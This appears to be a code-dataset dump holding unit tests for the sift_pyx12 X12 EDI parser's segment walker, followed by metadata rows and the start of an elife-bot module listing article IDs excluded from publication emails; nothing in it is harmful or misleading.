self.assertEqual(get_id_list(push), ['2000A'])
seg_data = sift_pyx12.segment.Segment(
'NM1*85*2*Provider Name*****XX*24423423~', '~', '*', ':')
self.errh.reset()
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertEqual(self.errh.err_cde, None, self.errh.err_str)
result = node.is_valid(seg_data, self.errh)
self.assertTrue(result)
self.assertEqual(self.errh.err_cde, None, self.errh.err_str)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), ['2010AA'])
    def test_mult_matching_subloops_ok(self):
        """
        Test for match of 820 Individual Remittance Loop

        Starting at HEADER/1000B/N1 with counts seeded along the whole
        header path, walking an ENT segment should pop out of 1000B and
        HEADER and push into TABLE2AREA3/2000B.
        """
        cmap = sift_pyx12.map_if.load_map_file('820.5010.X218.xml', self.param)
        # Sanity-check that every node on the header path exists in the map.
        node = cmap.getnodebypath('/ISA_LOOP/GS_LOOP/ST_LOOP/HEADER')
        self.assertNotEqual(node, None)
        self.assertEqual(node.base_name, 'loop')
        #node.cur_count = 1
        node = cmap.getnodebypath('/ISA_LOOP/GS_LOOP/ST_LOOP/HEADER/1000A')
        self.assertNotEqual(node, None)
        self.assertEqual(node.base_name, 'loop')
        #node.cur_count = 1
        node = cmap.getnodebypath('/ISA_LOOP/GS_LOOP/ST_LOOP/HEADER/1000B')
        self.assertNotEqual(node, None)
        self.assertEqual(node.base_name, 'loop')
        #node.cur_count = 1
        node = cmap.getnodebypath('/ISA_LOOP/GS_LOOP/ST_LOOP/HEADER/1000B/N1')
        self.assertNotEqual(node, None)
        start_node = node
        self.assertEqual(node.base_name, 'segment')
        #node.cur_count = 1
        seg_data = sift_pyx12.segment.Segment(
            'ENT*1*2J*EI*99998707~', '~', '*', ':')
        self.errh.reset()
        #print node.get_path()
        # Mark each loop/segment on the header path as already seen once.
        self.walker.setCountState({
            '/ISA_LOOP/GS_LOOP/ST_LOOP/HEADER': 1,
            '/ISA_LOOP/GS_LOOP/ST_LOOP/HEADER/1000A': 1,
            '/ISA_LOOP/GS_LOOP/ST_LOOP/HEADER/1000B': 1,
            '/ISA_LOOP/GS_LOOP/ST_LOOP/HEADER/1000B/N1': 1,
        })
        (node, pop, push) = self.walker.walk(
            node, seg_data, self.errh, 5, 4, None)
        self.assertEqual(self.errh.err_cde, None, self.errh.err_str)
        #print node.get_path()
        self.assertEqual(get_id_list(pop), ['1000B', 'HEADER'])
        self.assertEqual(get_id_list(push), ['TABLE2AREA3', '2000B'])
        # Replaying pop/push from the start node must land on the matched
        # node's parent loop path.
        self.assertEqual(traverse_path(start_node, pop, push),
                         pop_to_parent_loop(node).get_path())
def test_837i_2420a(self):
walker = walk_tree()
param = sift_pyx12.params.params()
cmap = sift_pyx12.map_if.load_map_file(
'837Q3.I.5010.X223.A1.xml', self.param)
errh = sift_pyx12.error_handler.errh_null()
path = '/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A/2000B/2300/2400/DTP'
node = cmap.getnodebypath(path)
self.assertNotEqual(node, None)
self.assertEqual(node.base_name, 'segment')
seg_data = sift_pyx12.segment.Segment(
'NM1*72*1*TEST*BAR****XX*9999974756~', '~', '*', ':')
(node, pop, push) = walker.walk(node, seg_data, errh, 5, 4, None)
self.assertNotEqual(node, None, 'walker failed to find %s' % (seg_data))
self.assertEqual(seg_data.get_seg_id(), node.id)
self.assertEqual(errh.err_cde, None, errh.err_str)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), ['2420A'])
def test_999_2110_IK4(self):
walker = walk_tree()
param = sift_pyx12.params.params()
cmap = sift_pyx12.map_if.load_map_file('999.5010.xml', self.param)
errh = sift_pyx12.error_handler.errh_null()
path = '/ISA_LOOP/GS_LOOP/ST_LOOP/HEADER/2000/2100/IK3'
node = cmap.getnodebypath(path)
self.assertNotEqual(node, None)
self.assertEqual(node.base_name, 'segment')
#node.cur_count = 1
walker.setCountState({node.parent.x12path: 1, node.x12path: 1})
seg_data = sift_pyx12.segment.Segment('IK4*3*116*7*88888-8888~', '~', '*', ':')
errh.reset()
(node, pop, push) = walker.walk(node, seg_data, errh, seg_count=8, cur_line=7, ls_id=None)
self.assertNotEqual(node, None, 'walker failed to find %s' % (seg_data))
self.assertEqual(seg_data.get_seg_id(), node.id)
self.assertEqual(errh.err_cde, None, errh.err_str)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), ['2110'])
def tearDown(self):
del self.errh
del self.map
del self.walker
class SegmentWalk(unittest.TestCase):
    """Segment-level walks through the 837P (4010 X098A1) map.

    Each test starts from a known map node, walks one raw segment
    string, and checks the matched node and the walker's error code.
    """
    def setUp(self):
        # Fresh walker, map, and null error handler for each test.
        self.walker = walk_tree()
        self.param = sift_pyx12.params.params()
        self.map = sift_pyx12.map_if.load_map_file(
            '837.4010.X098.A1.xml', self.param)
        self.errh = sift_pyx12.error_handler.errh_null()
    def test_match_regular_segment(self):
        """An N4 following the 2010AB NM1 matches with no loop change."""
        self.errh.reset()
        node = self.map.getnodebypath(
            '/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A/2010AB/NM1')
        seg_data = sift_pyx12.segment.Segment('N4*Billings*MT*56123', '~', '*', ':')
        (node, pop, push) = self.walker.walk(
            node, seg_data, self.errh, 5, 4, None)
        self.assertEqual(seg_data.get_seg_id(), node.id)
        # A sibling-segment match exits/enters no loops.
        self.assertEqual(get_id_list(pop), [])
        self.assertEqual(get_id_list(push), [])
    def test_match_ID_segment1(self):
        """A DTP after the 2300 CLM matches with no loop change."""
        self.errh.reset()
        node = self.map.getnodebypath(
            '/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A/2000B/2300/CLM')
        seg_data = sift_pyx12.segment.Segment('DTP*454*D8*20040101', '~', '*', ':')
        (node, pop, push) = self.walker.walk(
            node, seg_data, self.errh, 5, 4, None)
        self.assertEqual(seg_data.get_seg_id(), node.id)
        self.assertEqual(get_id_list(pop), [])
        self.assertEqual(get_id_list(push), [])
    def test_segment_required_fail1(self):
        """
        Skipped required segment
        """
        self.errh.reset()
        node = self.map.getnodebypath(
            '/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A/2010AA/NM1')
        self.assertNotEqual(node, None)
        self.assertEqual(node.base_name, 'segment')
        # Walk an N4 without the mandatory NM1 having been seen first.
        seg_data = sift_pyx12.segment.Segment('N4*NOWHERE*MA*30001~', '~', '*', ':')
        (node, pop, push) = self.walker.walk(
            node, seg_data, self.errh, 5, 4, None)
        # Error code '3' is expected for the skipped required segment.
        self.assertEqual(self.errh.err_cde, '3', self.errh.err_str)
        self.assertEqual(get_id_list(pop), [])
        self.assertEqual(get_id_list(push), [])
    def test_found_unused_segment1(self):
        """Walking a UNU segment in comp_test.xml yields error code '2'."""
        self.errh.reset()
        cmap = sift_pyx12.map_if.load_map_file('comp_test.xml', self.param)
        node = cmap.getnodebypath('/TST')
        self.assertNotEqual(node, None)
        self.assertEqual(node.base_name, 'segment')
        #node.cur_count = 1
        self.walker.setCountState({node.x12path: 1})
        seg_data = sift_pyx12.segment.Segment('UNU*AA*B~', '~', '*', ':')
        (node, pop, push) = self.walker.walk(node, seg_data, self.errh, 5, 4, None)
        #result = node.is_valid(comp, self.errh)
        #self.assertTrue(result)
        self.assertEqual(self.errh.err_cde, '2', self.errh.err_str)
        self.assertEqual(get_id_list(pop), [])
        self.assertEqual(get_id_list(push), [])
    def tearDown(self):
        # Drop fixtures so each test is isolated.
        del self.errh
        del self.map
        del self.walker
class SegmentWalk278(unittest.TestCase):
    """Segment walking against the 278 (4010 X094A1) map."""

    def setUp(self):
        self.walker = walk_tree()
        self.param = sift_pyx12.params.params()
        self.map = sift_pyx12.map_if.load_map_file(
            '278.4010.X094.A1.xml', self.param)
        self.errh = sift_pyx12.error_handler.errh_null()

    def test_match_regular_segment(self):
        """An HI after the 2000F DTP matches with no loop transitions."""
        self.errh.reset()
        start = self.map.getnodebypath('/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A/2000B/2000C/2000E/2000F/DTP')
        self.assertNotEqual(start, None)
        self.assertEqual(start.base_name, 'segment')
        seg_data = sift_pyx12.segment.Segment('HI*BO:T1017::::382', '~', '*', ':')
        (found, pop, push) = self.walker.walk(
            start, seg_data, self.errh, 5, 4, None)
        self.assertNotEqual(
            found, None, 'Segment not found: %s' % (seg_data.format()))
        self.assertEqual(seg_data.get_seg_id(), found.id)
        self.assertEqual(get_id_list(pop), [])
        self.assertEqual(get_id_list(push), [])
class Segment_ID_Checks(unittest.TestCase):
    """The walker must reject segment IDs that are too short or too long."""

    def setUp(self):
        self.walker = walk_tree()
        param = sift_pyx12.params.params()
        self.map = sift_pyx12.map_if.load_map_file('837.4010.X098.A1.xml', param)
        self.errh = sift_pyx12.error_handler.errh_null()
        self.node = self.map.getnodebypath('/ISA_LOOP/GS_LOOP/ST_LOOP/ST')

    def _walk_bad_seg_id(self, seg_str):
        """Walk one malformed segment: expect no match, error code '1',
        and no loop pops or pushes."""
        self.errh.reset()
        seg_data = sift_pyx12.segment.Segment(seg_str, '~', '*', ':')
        (found, pop, push) = self.walker.walk(
            self.node, seg_data, self.errh, 5, 4, None)
        self.assertEqual(found, None)
        self.assertEqual(self.errh.err_cde, '1', self.errh.err_str)
        self.assertEqual(get_id_list(pop), [])
        self.assertEqual(get_id_list(push), [])

    def test_segment_id_short(self):
        self._walk_bad_seg_id('Z*0019')

    def test_segment_id_long(self):
        self._walk_bad_seg_id('ZZZZ*0019')
class Counting(unittest.TestCase):
    """Segment repeat-count checks on the 270 2100B PER segment."""
    def setUp(self):
        self.walker = walk_tree()
        param = sift_pyx12.params.params()
        self.map = sift_pyx12.map_if.load_map_file('270.4010.X092.A1.xml', param)
        self.errh = sift_pyx12.error_handler.errh_null()
        #self.node = self.map.getnodebypath('/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A/2000B/2100B/N4')
        self.node = self.map.getnodebypath(
            '/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A/2000B/2100B/NM1')
        #self.node.parent.cur_count = 1 # Loop 2100B
        # Seed counts: the 2100B loop and its NM1 each seen once.
        self.countState = {
            self.node.parent.x12path: 1,
            self.node.x12path: 1,
        }
        #self.node.cur_count = 1
        self.node = self.map.getnodebypath(
            '/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A/2000B/2100B/PER')
        self.assertNotEqual(self.node, None)
        # The PER segment itself also starts counted once.
        self.countState[self.node.x12path] = 1
    def test_count_ok1(self):
        """Walking another PER with PER count 1 produces no error."""
        self.errh.reset()
        node = self.node
        #node.cur_count = 1
        self.walker.setCountState(self.countState)
        seg_data = sift_pyx12.segment.Segment('PER*IC*Name1*EM*dev@null.com~', '~', '*', ':')
        (node, pop, push) = self.walker.walk(node, seg_data, self.errh, 5, 4, None)
        self.assertNotEqual(node, None)
        self.assertEqual(self.errh.err_cde, None, self.errh.err_str)
    def test_count_ok2(self):
        """Walking another PER with PER count 2 still produces no error."""
        self.errh.reset()
        node = self.node
        #node.cur_count = 2
        countState = {
            self.node.parent.x12path: 1,
            self.node.x12path: 2,
        }
        self.walker.setCountState(countState)
        seg_data = sift_pyx12.segment.Segment('PER*IC*Name1*EM*dev@null.com~', '~', '*', ':')
        (node, pop, push) = self.walker.walk(node, seg_data, self.errh, 5, 4, None)
        self.assertNotEqual(node, None)
        self.assertEqual(self.errh.err_cde, None, self.errh.err_str)
    def test_count_fail1(self):
        """Walking another PER with PER count forced to 3 raises error '5'."""
        self.errh.reset()
        node = self.node
        #node.cur_count = 3
        self.walker.setCountState(self.countState)
        #self.walker.counter.increment(node.x12path)
        #self.walker.counter.increment(node.x12path)
        # Force the PER count to 3 before walking another PER.
        self.walker.counter.setCount(node.x12path, 3)
        seg_data = sift_pyx12.segment.Segment('PER*IC*Name1*EM*dev@null.com~', '~', '*', ':')
        self.assertNotEqual(node, None, 'Node not found')
        (node, pop, push) = self.walker.walk(node, seg_data, self.errh, 5, 4, None)
        self.assertEqual(self.errh.err_cde, '5', self.errh.err_str)
        self.assertEqual(get_id_list(pop), [])
        self.assertEqual(get_id_list(push), [])
class LoopCounting(unittest.TestCase):
    """Repeat-count limits on the 837P 2400 service-line loop."""

    # Map path of the loop under test, shared by both cases.
    LOOP_2400 = '/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A/2000B/2300/2400'

    def setUp(self):
        self.walker = walk_tree({})
        param = sift_pyx12.params.params()
        self.map = sift_pyx12.map_if.load_map_file('837.4010.X098.A1.xml', param)
        self.errh = sift_pyx12.error_handler.errh_null()

    def _walk_lx_at_count(self, loop_count):
        """Seed the 2400 loop count, walk an LX segment, return (pop, push)."""
        start = self.map.getnodebypath(self.LOOP_2400)
        self.assertNotEqual(start, None, 'Node not found')
        self.walker.setCountState({self.LOOP_2400: loop_count})
        self.errh.reset()
        seg_data = sift_pyx12.segment.Segment('LX*51~', '~', '*', ':')
        (found, pop, push) = self.walker.walk(
            start, seg_data, self.errh, 5, 4, None)
        return (pop, push)

    def test_max_loop_count_ok1(self):
        """48 prior repeats: another 2400 loop is still allowed."""
        (pop, push) = self._walk_lx_at_count(48)
        self.assertEqual(self.errh.err_cde, None, self.errh.err_str)
        self.assertEqual(get_id_list(pop), ['2400'])
        self.assertEqual(get_id_list(push), ['2400'])

    def test_max_loop_count_fail1(self):
        """50 prior repeats: the next 2400 loop raises error code '4'."""
        (pop, push) = self._walk_lx_at_count(50)
        self.assertEqual(self.errh.err_cde, '4', self.errh.err_str)
        self.assertEqual(get_id_list(pop), ['2400'])
        self.assertEqual(get_id_list(push), ['2400'])
class CountOrdinal(unittest.TestCase):
    """Ordinal (segment-order) checks inside the 834 2000/INS loop."""

    def setUp(self):
        # Seed the walker as if one 2000 loop and its INS were already seen.
        seeded = {
            '/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000': 1,
            '/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000/INS': 1,
        }
        self.walker = walk_tree(seeded)
        param = sift_pyx12.params.params()
        self.map = sift_pyx12.map_if.load_map_file('834.5010.X220.A1.xml', param)
        self.errh = sift_pyx12.error_handler.errh_null()
        self.node = self.map.getnodebypath('/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000/INS')
        self.assertNotEqual(self.node, None)

    def _walk_clean(self, start, seg_str):
        """Walk one segment; expect a match, no error, and no loop
        transitions.  Returns the matched node for chaining."""
        self.errh.reset()
        seg_data = sift_pyx12.segment.Segment(seg_str, '~', '*', ':')
        (found, pop, push) = self.walker.walk(
            start, seg_data, self.errh, 5, 4, None)
        self.assertNotEqual(found, None)
        self.assertEqual(self.errh.err_cde, None, self.errh.err_str)
        self.assertEqual(get_id_list(pop), [])
        self.assertEqual(get_id_list(push), [])
        return found

    def test_ord_ok1(self):
        node = self._walk_clean(self.node, 'REF*0F*1234~')
        self._walk_clean(node, 'REF*1L*91234~')

    def test_ord_ok2(self):
        node = self._walk_clean(self.node, 'REF*0F*1234~')
        self._walk_clean(node, 'REF*17*A232~')

    def test_ord_ok3(self):
        node = self._walk_clean(self.node, 'REF*17*1234~')
        self._walk_clean(node, 'REF*0F*A232~')

    def test_ord_bad1(self):
        node = self._walk_clean(self.node, 'REF*0F*1234~')
        node = self._walk_clean(node, 'DTP*297*D8*20040101~')
        # After the DTP, this REF is expected to fail with error code '1'.
        self.errh.reset()
        seg_data = sift_pyx12.segment.Segment('REF*17*A232~', '~', '*', ':')
        (node, pop, push) = self.walker.walk(
            node, seg_data, self.errh, 5, 4, None)
        self.assertEqual(self.errh.err_cde, '1', self.errh.err_str)
        self.assertEqual(get_id_list(pop), [])
        self.assertEqual(get_id_list(push), [])

    def test_lui_ok(self):
        """An LUI after the 2100A NM1 matches without loop transitions."""
        self.errh.reset()
        start = self.map.getnodebypath(
            '/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000/2100A/NM1')
        # Seed the 2100A loop and its NM1 as seen once.
        self.walker.setCountState({
            '/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000/2100A': 1,
            '/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000/2100A/NM1': 1,
        })
        self.assertNotEqual(start, None)
        seg_data = sift_pyx12.segment.Segment('LUI***ES~', '~', '*', ':')
        (found, pop, push) = self.walker.walk(
            start, seg_data, self.errh, 5, 4, None)
        self.assertNotEqual(found, None)
        self.assertEqual(self.errh.err_cde, None, self.errh.err_str)
        self.assertEqual(get_id_list(pop), [])
        self.assertEqual(get_id_list(push), [])
class LoopPathPopPush837(unittest.TestCase):
    """Loop pop/push lists produced while walking the 837P map."""

    def setUp(self):
        self.walker = walk_tree()
        param = sift_pyx12.params.params()
        self.errh = sift_pyx12.error_handler.errh_null()
        self.map = sift_pyx12.map_if.load_map_file('837.4010.X098.A1.xml', param)

    def _walk(self, map_path, seg_str):
        """Walk seg_str from map_path; assert a match and return (pop, push)."""
        start = self.map.getnodebypath(map_path)
        seg_data = sift_pyx12.segment.Segment(seg_str, '~', '*', ':')
        (found, pop, push) = self.walker.walk(
            start, seg_data, self.errh, 5, 4, None)
        self.assertNotEqual(found, None)
        self.assertEqual(seg_data.get_seg_id(), found.id)
        return (pop, push)

    def test_path_sub_loop(self):
        (pop, push) = self._walk(
            '/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A/2000B/2300/HI',
            'NM1*82*2*Provider Name*****XX*24423423~')
        self.assertEqual(get_id_list(pop), [])
        self.assertEqual(get_id_list(push), ['2310B'])

    def test_path_up3(self):
        (pop, push) = self._walk(
            '/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A/2000B/2300/2400/2430/SVD',
            'LX*2')
        self.assertEqual(get_id_list(pop), ['2430', '2400'])
        self.assertEqual(get_id_list(push), ['2400'])
class LoopPathPopPush834(unittest.TestCase):
    """Loop pop/push lists produced while walking the 834 map."""

    def setUp(self):
        self.walker = walk_tree()
        param = sift_pyx12.params.params()
        self.map = sift_pyx12.map_if.load_map_file('834.5010.X220.A1.xml', param)
        self.errh = sift_pyx12.error_handler.errh_null()

    def _walk(self, map_path, seg_str):
        """Walk seg_str from map_path; assert a match and return (pop, push)."""
        start = self.map.getnodebypath(map_path)
        seg_data = sift_pyx12.segment.Segment(seg_str, '~', '*', ':')
        (found, pop, push) = self.walker.walk(
            start, seg_data, self.errh, 5, 4, None)
        self.assertNotEqual(found, None)
        self.assertEqual(seg_data.get_seg_id(), found.id)
        return (pop, push)

    def test_path_same_repeat(self):
        # INS to INS: the 2000 loop repeats.
        (pop, push) = self._walk(
            '/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000/INS',
            'INS*Y*18*030*20*A')
        self.assertEqual(get_id_list(pop), ['2000'])
        self.assertEqual(get_id_list(push), ['2000'])

    def test_path_in(self):
        # DTP stays inside the current 2000 loop.
        (pop, push) = self._walk(
            '/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000/INS',
            'DTP*356*D8*20080101')
        self.assertEqual(get_id_list(pop), [])
        self.assertEqual(get_id_list(push), [])

    def test_path_repeat(self):
        # INS seen from the DTP position also restarts loop 2000.
        (pop, push) = self._walk(
            '/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000/DTP',
            'INS*Y*18*030*20*A')
        self.assertEqual(get_id_list(pop), ['2000'])
        self.assertEqual(get_id_list(push), ['2000'])

    def test_path_up(self):
        # A new ST pops all the way out to ST_LOOP and back in.
        (pop, push) = self._walk(
            '/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000/2100A/NM1',
            'ST*834*11')
        self.assertEqual(
            get_id_list(pop), ['2100A', '2000', 'DETAIL', 'ST_LOOP'])
        self.assertEqual(get_id_list(push), ['ST_LOOP'])

    def test_path_up2(self):
        # A new GS pops out to GS_LOOP and back in.
        (pop, push) = self._walk(
            '/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000/INS',
            'GS*BE*AAA*BBB*20081116*2044*328190001*X*004010X095A1')
        self.assertEqual(
            get_id_list(pop), ['2000', 'DETAIL', 'ST_LOOP', 'GS_LOOP'])
        self.assertEqual(get_id_list(push), ['GS_LOOP'])

    def test_path_in2(self):
        (pop, push) = self._walk(
            '/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000/INS',
            'DTP*356*D8*20080203')
        self.assertEqual(get_id_list(pop), [])
        self.assertEqual(get_id_list(push), [])
class Bug837i(unittest.TestCase):
    """Regression test: 837I walk from the 2400 loop into 2420A."""

    def setUp(self):
        self.walker = walk_tree()
        self.param = sift_pyx12.params.params()
        self.map = sift_pyx12.map_if.load_map_file('837Q3.I.5010.X223.A1.xml', self.param)
        self.errh = sift_pyx12.error_handler.errh_null()

    def testWalk2420A(self):
        """From the 2400 loop (counted once), an NM1*72 pushes into 2420A."""
        mpath = '/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A/2000B/2300/2400'
        start = self.map.getnodebypath(mpath)
        self.assertNotEqual(start, None, 'Path %s not found' % (mpath))
        self.assertEqual(start.base_name, 'loop')
        self.walker.setCountState({start.x12path: 1})
        seg_data = sift_pyx12.segment.Segment('NM1*72*1*TEST*USER****XX*9107999999~', '~', '*', ':')
        (found, pop, push) = self.walker.walk(
            start, seg_data, self.errh, 5, 4, None)
        self.assertNotEqual(found, None)
        self.assertEqual(seg_data.get_seg_id(), found.id)
        self.assertEqual(get_id_list(pop), [])
        self.assertEqual(get_id_list(push), ['2420A'])

    def tearDown(self):
        """Release the per-test fixtures created in setUp."""
        del self.errh, self.map, self.walker
| 42.77093
| 116
| 0.618791
| 4,992
| 36,783
| 4.354567
| 0.061899
| 0.120066
| 0.04016
| 0.088325
| 0.895989
| 0.881728
| 0.865949
| 0.846766
| 0.821235
| 0.794645
| 0
| 0.051353
| 0.227605
| 36,783
| 859
| 117
| 42.820722
| 0.713773
| 0.050132
| 0
| 0.727007
| 0
| 0
| 0.114231
| 0.067801
| 0
| 0
| 0
| 0
| 0.332847
| 1
| 0.086131
| false
| 0
| 0.010219
| 0
| 0.112409
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
505c0134c92337c1c6516a76ae59979c8b898bcd
| 37,362
|
py
|
Python
|
provider/blacklist.py
|
gnott/elife-bot
|
584c315d15d1289e0d2c27c28aaaae31174812e4
|
[
"MIT"
] | null | null | null |
provider/blacklist.py
|
gnott/elife-bot
|
584c315d15d1289e0d2c27c28aaaae31174812e4
|
[
"MIT"
] | null | null | null |
provider/blacklist.py
|
gnott/elife-bot
|
584c315d15d1289e0d2c27c28aaaae31174812e4
|
[
"MIT"
] | null | null | null |
"""Blacklist particular articles from doing particular activities"""
def publication_email_article_do_not_send_list():
    """
    Return list of do not send article DOI id

    Each value is a zero-padded, 5-character numeric article id string
    (the numeric tail of an article DOI).  Articles listed here must be
    excluded from publication email sending.
    """
    do_not_send_list = [
        "00003", "00005", "00007", "00011", "00012", "00013", "00031", "00036", "00047", "00048",
        "00049", "00051", "00065", "00067", "00068", "00070", "00078", "00090", "00093", "00102",
        "00105", "00109", "00116", "00117", "00133", "00160", "00170", "00171", "00173", "00178",
        "00181", "00183", "00184", "00190", "00205", "00218", "00220", "00230", "00231", "00240",
        "00242", "00243", "00247", "00248", "00260", "00269", "00270", "00278", "00281", "00286",
        "00288", "00290", "00291", "00299", "00301", "00302", "00306", "00308", "00311", "00312",
        "00321", "00324", "00326", "00327", "00329", "00333", "00334", "00336", "00337", "00340",
        "00347", "00348", "00351", "00352", "00353", "00354", "00358", "00362", "00365", "00367",
        "00378", "00380", "00385", "00386", "00387", "00400", "00411", "00415", "00421", "00422",
        "00425", "00426", "00429", "00435", "00444", "00450", "00452", "00458", "00459", "00461",
        "00467", "00471", "00473", "00475", "00476", "00477", "00481", "00482", "00488", "00491",
        "00498", "00499", "00505", "00508", "00515", "00518", "00522", "00523", "00533", "00534",
        "00537", "00542", "00558", "00563", "00565", "00569", "00571", "00572", "00573", "00577",
        "00590", "00592", "00593", "00594", "00603", "00605", "00615", "00625", "00626", "00631",
        "00632", "00633", "00638", "00639", "00640", "00641", "00642", "00646", "00647", "00648",
        "00654", "00655", "00658", "00659", "00662", "00663", "00666", "00668", "00669", "00672",
        "00675", "00676", "00683", "00691", "00692", "00699", "00704", "00708", "00710", "00712",
        "00723", "00726", "00729", "00731", "00736", "00744", "00745", "00747", "00750", "00757",
        "00759", "00762", "00767", "00768", "00772", "00776", "00778", "00780", "00782", "00785",
        "00790", "00791", "00792", "00799", "00800", "00801", "00802", "00804", "00806", "00808",
        "00813", "00822", "00824", "00825", "00828", "00829", "00842", "00844", "00845", "00855",
        "00856", "00857", "00861", "00862", "00863", "00866", "00868", "00873", "00882", "00884",
        "00886", "00895", "00899", "00903", "00905", "00914", "00924", "00926", "00932", "00933",
        "00940", "00943", "00947", "00948", "00951", "00953", "00954", "00958", "00960", "00961",
        "00963", "00966", "00967", "00969", "00971", "00983", "00992", "00994", "00996", "00999",
        "01004", "01008", "01009", "01020", "01029", "01030", "01042", "01045", "01061", "01064",
        "01067", "01071", "01074", "01084", "01085", "01086", "01089", "01096", "01098", "01102",
        "01104", "01108", "01114", "01115", "01119", "01120", "01123", "01127", "01133", "01135",
        "01136", "01138", "01139", "01140", "01149", "01157", "01159", "01160", "01169", "01179",
        "01180", "01197", "01201", "01202", "01206", "01211", "01213", "01214", "01221", "01222",
        "01228", "01229", "01233", "01234", "01236", "01239", "01252", "01256", "01257", "01267",
        "01270", "01273", "01279", "01287", "01289", "01291", "01293", "01294", "01295", "01296",
        "01298", "01299", "01305", "01308", "01310", "01311", "01312", "01319", "01322", "01323",
        "01326", "01328", "01339", "01340", "01341", "01345", "01350", "01355", "01369", "01370",
        "01374", "01381", "01385", "01386", "01387", "01388", "01402", "01403", "01412", "01414",
        "01426", "01428", "01433", "01434", "01438", "01439", "01440", "01456", "01457", "01460",
        "01462", "01465", "01469", "01473", "01479", "01481", "01482", "01483", "01488", "01489",
        "01494", "01496", "01498", "01501", "01503", "01514", "01515", "01516", "01519", "01524",
        "01530", "01535", "01539", "01541", "01557", "01561", "01566", "01567", "01569", "01574",
        "01579", "01581", "01584", "01587", "01596", "01597", "01599", "01603", "01604", "01605",
        "01607", "01608", "01610", "01612", "01621", "01623", "01630", "01632", "01633", "01637",
        "01641", "01658", "01659", "01662", "01663", "01671", "01680", "01681", "01684", "01694",
        "01695", "01699", "01700", "01710", "01715", "01724", "01730", "01738", "01739", "01741",
        "01749", "01751", "01754", "01760", "01763", "01775", "01776", "01779", "01808", "01809",
        "01812", "01816", "01817", "01820", "01828", "01831", "01832", "01833", "01834", "01839",
        "01845", "01846", "01849", "01856", "01857", "01861", "01867", "01873", "01879", "01883",
        "01888", "01892", "01893", "01901", "01906", "01911", "01913", "01914", "01916", "01917",
        "01926", "01928", "01936", "01939", "01944", "01948", "01949", "01958", "01963", "01964",
        "01967", "01968", "01977", "01979", "01982", "01990", "01993", "01998", "02001", "02008",
        "02009", "02020", "02024", "02025", "02028", "02030", "02040", "02041", "02042", "02043",
        "02046", "02053", "02057", "02061", "02062", "02069", "02076", "02077", "02078", "02087",
        "02088", "02094", "02104", "02105", "02109", "02112", "02115", "02130", "02131", "02137",
        "02148", "02151", "02152", "02164", "02171", "02172", "02181", "02184", "02189", "02190",
        "02196", "02199", "02200", "02203", "02206", "02208", "02217", "02218", "02224", "02230",
        "02236", "02238", "02242", "02245", "02252", "02257", "02260", "02265", "02270", "02272",
        "02273", "02277", "02283", "02286", "02289", "02304", "02313", "02322", "02324", "02349",
        "02362", "02365", "02369", "02370", "02372", "02375", "02384", "02386", "02387", "02391",
        "02394", "02395", "02397", "02403", "02407", "02409", "02419", "02439", "02440", "02443",
        "02444", "02445", "02450", "02451", "02475", "02478", "02481", "02482", "02490", "02501",
        "02504", "02510", "02511", "02515", "02516", "02517", "02523", "02525", "02531", "02535",
        "02536", "02555", "02557", "02559", "02564", "02565", "02576", "02583", "02589", "02590",
        "02598", "02615", "02618", "02619", "02626", "02630", "02634", "02637", "02641", "02653",
        "02658", "02663", "02667", "02669", "02670", "02671", "02674", "02676", "02678", "02687",
        "02715", "02725", "02726", "02730", "02734", "02736", "02740", "02743", "02747", "02750",
        "02755", "02758", "02763", "02772", "02777", "02780", "02784", "02786", "02791", "02792",
        "02798", "02805", "02809", "02811", "02812", "02813", "02833", "02839", "02840", "02844",
        "02848", "02851", "02854", "02860", "02862", "02863", "02866", "02872", "02875", "02882",
        "02893", "02897", "02904", "02907", "02910", "02917", "02923", "02935", "02938", "02945",
        "02949", "02950", "02951", "02956", "02963", "02964", "02975", "02978", "02981", "02993",
        "02996", "02999", "03005", "03007", "03011", "03023", "03025", "03031", "03032", "03035",
        "03043", "03058", "03061", "03068", "03069", "03075", "03077", "03080", "03083", "03091",
        "03100", "03104", "03110", "03115", "03116", "03125", "03126", "03128", "03145", "03146",
        "03159", "03164", "03176", "03178", "03180", "03185", "03191", "03197", "03198", "03205",
        "03206", "03222", "03229", "03233", "03235", "03239", "03245", "03251", "03254", "03255",
        "03271", "03273", "03275", "03282", "03285", "03293", "03297", "03300", "03307", "03311",
        "03318", "03342", "03346", "03348", "03351", "03357", "03363", "03371", "03372", "03374",
        "03375", "03383", "03385", "03397", "03398", "03399", "03401", "03405", "03406", "03416",
        "03421", "03422", "03427", "03430", "03433", "03435", "03440", "03443", "03464", "03467",
